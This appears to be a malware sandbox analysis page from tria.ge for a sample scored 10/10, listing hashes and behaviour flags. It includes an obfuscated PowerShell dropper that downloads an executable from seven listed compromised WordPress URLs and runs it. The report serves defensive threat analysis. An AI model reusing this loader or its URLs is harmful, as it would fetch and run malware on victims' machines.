Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    16ea5d66df1706dee374737e0af072ba_JaffaCakes118

  • Size

    172KB

  • Sample

    240505-kveqlsch6x

  • MD5

    16ea5d66df1706dee374737e0af072ba

  • SHA1

    8bb0e715e57ead75d33265a28329b4adb693dd7f

  • SHA256

    a162bffd2c7937b14cbc56696db2b2a7a964b9998e204c32edaa94c4de1cddc1

  • SHA512

    a5af0e7d61d37f672223e9dcccc2abd536dd67256f5ba624846ce89439ab21d00c9980c816a68ba1894f5b57fa56370776116d3ca87bde52e200097ab31ac938

  • SSDEEP

    1536:erdi1Ir77zOH98Wj2gpngR+a9LpxO8nq78ct2PU7MXKSSxH5pcKaJn57y2t:erfrzOH98ipgekB57V

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$Uhxq4lu=(('Cs'+'din')+'k'+'0');&('n'+'e'+'w-item') $enV:USeRpROfILE\uofWsUv\lnxYN6_\ -itemtype DireCToRY;[Net.ServicePointManager]::"S`E`C`UrITypr`oTOcOl" = ('t'+'l'+('s12,'+' t'+'l')+('s'+'1'+'1, tls'));$Fzgau0e = ('M'+'jl'+('zif'+'mu'));$C4i9x5n=(('Rh'+'m')+'m'+('zq'+'s'));$D89iwvk=$env:userprofile+((('bC'+'RUofw')+'su'+'vb'+('CRLn'+'xy')+'n6'+'_b'+'C'+'R') -cREplaCe('bC'+'R'),[chaR]92)+$Fzgau0e+(('.e'+'x')+'e');$Staqmrf=('A'+('ge'+'t')+('kk'+'y'));$Wub3m1t=&('n'+'ew'+'-object') Net.wEBCLienT;$Anzl9uk=(('ht'+'t')+('p:'+'//')+('rh'+'y')+'t'+'o'+'n-'+('bu'+'ild')+('in'+'g')+'.c'+('om/'+'wp-a')+('dmin/'+'Ey8qV'+'0/*')+('htt'+'p:')+('//'+'ez')+('zl'+'l')+('.'+'com/w'+'p')+('-in'+'c')+'lu'+('de'+'s/KIU2WU'+'/')+'*h'+'t'+('t'+'p://t'+'el')+('l'+'me')+('t'+'ec')+('h.'+'c')+('om'+'/wp-co'+'nt'+'en')+('t'+'/4k')+'a'+('/'+'*http')+('s'+'://elm')+('undo'+'del'+'ar')+('epost'+'e')+'r'+'i'+'a'+'.'+('com'+'/wp'+'-')+('a'+'dm')+'i'+('n/0'+'PV')+('VmJm/*'+'h'+'t')+('tp'+'s://ma')+('n'+'ue')+'l'+('roza'+'s.cl/')+'a'+('sse'+'t'+'s'+'/XWN/*h'+'tt')+'p'+'s'+(':/'+'/')+'h'+('ar'+'itdha')+('rni.c'+'om'+'/')+('wp-a'+'d')+('min/b'+'ZM/'+'*ht')+('tp'+'s://t')+'he'+('w'+'orks-grou'+'p'+'.'+'com'+'/s')+('it'+'e/pQ')+('T'+'6j')+'5/')."SP`Lit"([char]42);$Ce1slsq=('Tu'+'zc'+('x'+'l4'));foreach($Pvsedn3 in $Anzl9uk){try{$Wub3m1t."dOWn`loA`D`FIlE"($Pvsedn3, $D89iwvk);$V7txmd_=('Q'+('59q1'+'6o'));If ((.('Get'+'-Ite'+'m') $D89iwvk)."L`enGTh" -ge 28279) {.('Invo'+'ke'+'-Item')($D89iwvk);$Lju1_sh=('I'+('14'+'4')+('d'+'4z'));break;$Hzp3au_=(('C7'+'su')+('a0'+'7'))}}catch{}}$Gsgcie6=(('Hv'+'_o')+'g5'+'t')
URLs
exe.dropper

http://rhyton-building.com/wp-admin/Ey8qV0/

exe.dropper

http://ezzll.com/wp-includes/KIU2WU/

exe.dropper

http://tellmetech.com/wp-content/4ka/

exe.dropper

https://elmundodelareposteria.com/wp-admin/0PVVmJm/

exe.dropper

https://manuelrozas.cl/assets/XWN/

exe.dropper

https://haritdharni.com/wp-admin/bZM/

exe.dropper

https://theworks-group.com/site/pQT6j5/

Targets

    • Target

      16ea5d66df1706dee374737e0af072ba_JaffaCakes118

    • Size

      172KB

    • MD5

      16ea5d66df1706dee374737e0af072ba

    • SHA1

      8bb0e715e57ead75d33265a28329b4adb693dd7f

    • SHA256

      a162bffd2c7937b14cbc56696db2b2a7a964b9998e204c32edaa94c4de1cddc1

    • SHA512

      a5af0e7d61d37f672223e9dcccc2abd536dd67256f5ba624846ce89439ab21d00c9980c816a68ba1894f5b57fa56370776116d3ca87bde52e200097ab31ac938

    • SSDEEP

      1536:erdi1Ir77zOH98Wj2gpngR+a9LpxO8nq78ct2PU7MXKSSxH5pcKaJn57y2t:erfrzOH98ipgekB57V

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.